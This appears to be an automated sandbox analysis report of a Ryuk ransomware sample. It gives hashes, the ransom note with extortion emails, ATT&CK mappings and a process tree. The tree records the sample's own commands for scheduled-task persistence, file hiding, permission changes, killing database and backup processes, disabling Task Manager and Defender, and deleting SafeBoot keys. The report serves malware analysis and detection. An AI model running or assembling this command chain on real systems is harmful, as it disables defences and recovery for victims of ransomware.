Analysis

  • max time kernel
    137s
  • max time network
    52s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    20-10-2022 15:40

General

  • Target

    775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe

  • Size

    885KB

  • MD5

    a650d5676dc2c91a3af2216044ddaf8c

  • SHA1

    851eea629fda6f930ebfd7ac45de5e8bc3f506b5

  • SHA256

    775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6

  • SHA512

    463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

  • SSDEEP

    12288:q/2O9w8wycU2JlJYqWYgeWYg955/155/0QebUlAAsjsKqgooRn6X:qbC8tUlqgQKUKRjsKqgbN6

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note
Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at filereopening@msgden.com or filereopening@cyberfear.com You will receive btc address for payment in the reply letter Ryuk No system is safe
Emails

filereopening@msgden.com

filereopening@cyberfear.com

Signatures

  • Ryuk

    Ransomware distributed via existing botnets, often Trickbot or Emotet.

  • Disables Task Manager via registry modification
  • Drops startup file 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
    "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:860
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:840
      • C:\Windows\system32\schtasks.exe
        schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Creates scheduled task(s)
        PID:2044
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
      • Drops startup file
      PID:1736
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      2⤵
        PID:268
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1528
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
          3⤵
          • Creates scheduled task(s)
          PID:588
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:332
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
          3⤵
          • Drops startup file
          • Views/modifies file attributes
          PID:596
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:612
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F
          3⤵
          • Creates scheduled task(s)
          PID:1516
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:528
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F
          3⤵
          • Creates scheduled task(s)
          PID:1732
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:700
        • C:\Windows\system32\attrib.exe
          attrib +h +s ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:1784
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1376
        • C:\Windows\system32\attrib.exe
          attrib +h +s C:\ProgramData\ryuk.exe
          3⤵
          • Views/modifies file attributes
          PID:460
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:288
        • C:\Windows\system32\cmd.exe
          cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          3⤵
            PID:1012
            • C:\Windows\system32\icacls.exe
              icacls * /grant Everyone:(OI)(CI)F /T /C /Q
              4⤵
              • Modifies file permissions
              PID:1660
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:540
          • C:\Windows\system32\reg.exe
            reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
            3⤵
              PID:304
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1432
            • C:\Windows\system32\cmd.exe
              cmd.exe /c taskkill /t /f /im sql*
              3⤵
                PID:1192
                • C:\Windows\system32\taskkill.exe
                  taskkill /t /f /im sql*
                  4⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1912
              • C:\Windows\system32\taskkill.exe
                taskkill /f /t /im veeam*
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1944
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
              2⤵
                PID:2012
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
                2⤵
                  PID:2024
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
                  2⤵
                    PID:1568
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
                    2⤵
                      PID:1648
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
                      2⤵
                        PID:1420
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                        2⤵
                          PID:1892
                          • C:\Windows\system32\reg.exe
                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                            3⤵
                              PID:2004
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                            2⤵
                              PID:1036
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                3⤵
                                  PID:580
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                2⤵
                                  PID:1040
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                    3⤵
                                      PID:1728
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                    2⤵
                                      PID:1384
                                      • C:\Windows\system32\reg.exe
                                        reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                        3⤵
                                          PID:1528

                                    Network

                                    MITRE ATT&CK Matrix ATT&CK v6

                                    Execution

                                    Scheduled Task

                                    1
                                    T1053

                                    Persistence

                                    Scheduled Task

                                    1
                                    T1053

                                    Hidden Files and Directories

                                    1
                                    T1158

                                    Privilege Escalation

                                    Scheduled Task

                                    1
                                    T1053

                                    Defense Evasion

                                    File Permissions Modification

                                    1
                                    T1222

                                    Hidden Files and Directories

                                    1
                                    T1158

                                    Discovery

                                    Query Registry

                                    1
                                    T1012

                                    Peripheral Device Discovery

                                    1
                                    T1120

                                    System Information Discovery

                                    2
                                    T1082

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\ProgramData\RYUKID
                                      Filesize

                                      8B

                                      MD5

                                      f7c9aa8109768d75ea7402cb915b51be

                                      SHA1

                                      cc649a88c2266ae98c2c378a138329e9dcf1832a

                                      SHA256

                                      a2ed9868223619ce158c30a1701f34935ff847d72a72b970be812bc91b5440fa

                                      SHA512

                                      bc70b35f2a6feecb023aad2541cd2f5a838deff88d09fbd5217f27766c845c44c2fdfa01d441a8fb130201771ddd273bf73c982388970783133e7960a7e8c4c7

                                    • C:\ProgramData\RyukReadMe.txt
                                      Filesize

                                      1KB

                                      MD5

                                      e5776afce2e7d6fa4feb7a0c4bc2e004

                                      SHA1

                                      8b3cd15a7e34d4b1c0800dad92a07c60647f44dd

                                      SHA256

                                      4ce8d384cf4f82223dde53c4fe9e9e4a249140068ecc9146b6d68c14278a3be7

                                      SHA512

                                      d03dafeae3ccced40bc20dcbc5cfffc13ec01b163d0d7ff5291c088f3e56971645837a0f3405c32fc6467a2d39d2396645b3eac0b2076d88a3110c42b53cd7c6

                                    • C:\ProgramData\hrmlog1
                                      Filesize

                                      2KB

                                      MD5

                                      bf3dc7e7792a2b38f146440ad4f79a22

                                      SHA1

                                      a323a963c8efbd3480399611c34bd38a0c8f6721

                                      SHA256

                                      f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41

                                      SHA512

                                      04cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805

                                    • C:\ProgramData\hrmlog1
                                      Filesize

                                      2KB

                                      MD5

                                      bf3dc7e7792a2b38f146440ad4f79a22

                                      SHA1

                                      a323a963c8efbd3480399611c34bd38a0c8f6721

                                      SHA256

                                      f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41

                                      SHA512

                                      04cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805

                                    • C:\ProgramData\hrmlog2
                                      Filesize

                                      292B

                                      MD5

                                      9dbd99471b38780584934dce1c838dc8

                                      SHA1

                                      8826b382ab74a575991fc5a5747bea695913199b

                                      SHA256

                                      02c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a

                                      SHA512

                                      01f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b

                                    • C:\ProgramData\hrmlog2
                                      Filesize

                                      292B

                                      MD5

                                      9dbd99471b38780584934dce1c838dc8

                                      SHA1

                                      8826b382ab74a575991fc5a5747bea695913199b

                                      SHA256

                                      02c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a

                                      SHA512

                                      01f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b

                                    • C:\ProgramData\ryuk.exe
                                      Filesize

                                      885KB

                                      MD5

                                      a650d5676dc2c91a3af2216044ddaf8c

                                      SHA1

                                      851eea629fda6f930ebfd7ac45de5e8bc3f506b5

                                      SHA256

                                      775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6

                                      SHA512

                                      463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

                                    • C:\Users\Admin\AppData\Local\Temp\RYUKID
                                      Filesize

                                      8B

                                      MD5

                                      f7c9aa8109768d75ea7402cb915b51be

                                      SHA1

                                      cc649a88c2266ae98c2c378a138329e9dcf1832a

                                      SHA256

                                      a2ed9868223619ce158c30a1701f34935ff847d72a72b970be812bc91b5440fa

                                      SHA512

                                      bc70b35f2a6feecb023aad2541cd2f5a838deff88d09fbd5217f27766c845c44c2fdfa01d441a8fb130201771ddd273bf73c982388970783133e7960a7e8c4c7

                                    • C:\Users\Admin\AppData\Local\Temp\hrmlog1
                                      Filesize

                                      2KB

                                      MD5

                                      bf3dc7e7792a2b38f146440ad4f79a22

                                      SHA1

                                      a323a963c8efbd3480399611c34bd38a0c8f6721

                                      SHA256

                                      f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41

                                      SHA512

                                      04cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805

                                    • C:\Users\Admin\AppData\Local\Temp\hrmlog2
                                      Filesize

                                      292B

                                      MD5

                                      9dbd99471b38780584934dce1c838dc8

                                      SHA1

                                      8826b382ab74a575991fc5a5747bea695913199b

                                      SHA256

                                      02c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a

                                      SHA512

                                      01f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
                                      Filesize

                                      885KB

                                      MD5

                                      a650d5676dc2c91a3af2216044ddaf8c

                                      SHA1

                                      851eea629fda6f930ebfd7ac45de5e8bc3f506b5

                                      SHA256

                                      775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6

                                      SHA512

                                      463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

                                    • memory/268-58-0x0000000000000000-mapping.dmp
                                    • memory/288-72-0x0000000000000000-mapping.dmp
                                    • memory/304-76-0x0000000000000000-mapping.dmp
                                    • memory/332-61-0x0000000000000000-mapping.dmp
                                    • memory/460-71-0x0000000000000000-mapping.dmp
                                    • memory/528-66-0x0000000000000000-mapping.dmp
                                    • memory/540-74-0x0000000000000000-mapping.dmp
                                    • memory/580-98-0x0000000000000000-mapping.dmp
                                    • memory/588-60-0x0000000000000000-mapping.dmp
                                    • memory/596-62-0x0000000000000000-mapping.dmp
                                    • memory/612-64-0x0000000000000000-mapping.dmp
                                    • memory/700-68-0x0000000000000000-mapping.dmp
                                    • memory/840-54-0x0000000000000000-mapping.dmp
                                    • memory/860-103-0x000007FEFB741000-0x000007FEFB743000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/1012-73-0x0000000000000000-mapping.dmp
                                    • memory/1036-97-0x0000000000000000-mapping.dmp
                                    • memory/1040-99-0x0000000000000000-mapping.dmp
                                    • memory/1192-77-0x0000000000000000-mapping.dmp
                                    • memory/1376-70-0x0000000000000000-mapping.dmp
                                    • memory/1384-101-0x0000000000000000-mapping.dmp
                                    • memory/1420-93-0x0000000000000000-mapping.dmp
                                    • memory/1432-75-0x0000000000000000-mapping.dmp
                                    • memory/1516-65-0x0000000000000000-mapping.dmp
                                    • memory/1528-102-0x0000000000000000-mapping.dmp
                                    • memory/1528-59-0x0000000000000000-mapping.dmp
                                    • memory/1568-87-0x0000000000000000-mapping.dmp
                                    • memory/1648-91-0x0000000000000000-mapping.dmp
                                    • memory/1660-78-0x0000000000000000-mapping.dmp
                                    • memory/1728-100-0x0000000000000000-mapping.dmp
                                    • memory/1732-67-0x0000000000000000-mapping.dmp
                                    • memory/1736-56-0x0000000000000000-mapping.dmp
                                    • memory/1784-69-0x0000000000000000-mapping.dmp
                                    • memory/1892-95-0x0000000000000000-mapping.dmp
                                    • memory/1912-84-0x0000000000000000-mapping.dmp
                                    • memory/1944-79-0x0000000000000000-mapping.dmp
                                    • memory/2004-96-0x0000000000000000-mapping.dmp
                                    • memory/2012-80-0x0000000000000000-mapping.dmp
                                    • memory/2024-83-0x0000000000000000-mapping.dmp
                                    • memory/2044-55-0x0000000000000000-mapping.dmp